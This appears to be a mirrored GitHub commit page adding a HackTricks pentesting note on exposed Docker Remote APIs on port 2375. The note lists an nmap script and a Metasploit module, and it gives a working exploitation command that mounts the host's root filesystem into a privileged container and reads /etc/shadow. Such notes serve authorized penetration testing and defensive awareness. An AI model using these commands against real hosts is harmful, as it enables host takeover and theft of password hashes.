Mirrors/hacktricks
2
0
Fork 0
mirror of https://github.com/carlospolop/hacktricks synced 2024-11-14 08:57:55 +00:00
Code Issues Projects Releases Packages Wiki Activity

Merge pull request #46 from dinosn/patch-1

Browse source 
2375-pentesting-docker
This commit is contained in:
Carlos Polop 2020-12-15 10:01:00 +01:00 committed by GitHub
commit 987035fde6
No known key found for this signature in database
GPG key ID: 4AEE18F83AFDEB23
1 changed files with 29 additions and 0 deletions
Show stats Download patch file Download diff file Expand all files Collapse all files

29
pentesting/2375-pentesting-docker Normal file
View file

@ -0,0 +1,29 @@
# 2375 - Pentesting Docker API
## Basic Information
Remote API is running by default on 2375 port when enabled. The service by default will not require authentication allowing an attacker to start a priviledged docker container. By using the Remote API one can attach hosts / \(root directory\) to the container and read/write files of the host\'s environment.
**Default port:** 2375
```text
PORT STATE SERVICE
2375/tcp open docker
```
## Enumeration
```bash
msf> use exploit/linux/http/docker_daemon_tcp
nmap -sV --script "docker-*" -p <PORT> <IP>
```
## Exploitation
Check if it's vulnerable to execute arbitrary code:
```text
docker -H <host>:2375 run --rm -it --privileged --net=host -v /:/mnt alpine
cat /mnt/etc/shadow
```
* [https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/CVE%20Exploits/Docker%20API%20RCE.py](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/CVE%20Exploits/Docker%20API%20RCE.py)